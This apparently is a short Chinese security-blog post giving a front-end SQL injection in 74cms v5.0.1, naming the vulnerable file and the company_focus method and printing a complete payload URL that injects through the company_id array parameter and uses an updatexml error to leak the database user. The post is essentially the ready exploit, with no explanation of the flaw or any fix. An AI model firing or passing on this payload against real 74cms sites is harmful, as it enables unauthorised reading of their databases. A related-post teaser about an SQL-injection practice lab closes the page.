[HW漏洞]74cms v5.0.1 前台sql注入(旧)

  • A+
所属分类:安全文章

文件位置

74cmsuploadApplicationHomeControllerAjaxPersonalController.class.php

 

方法

function company_focus($company_id)

 

payload

http://0-sec.org/74cms/5.0.1/upload/index.php?m=&c=AjaxPersonal&a=company_focus&company_id[0]=match&company_id[1][0]=aaaaaaa") and updatexml(1,concat(0x7e,(select user())),0) -- a

 

相关推荐: SQL注入漏洞靶场实战-1

Sqli - labs 安装与lesson1-4实战所需环境:1. PHP2. MYSQL3. Apache/Nginx以上三项Debian都自带了,2与3直接开启即可,但是有几点要注意:1. Debian下的MySql每次登录的时候默认需要授权,即必须使用s…

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: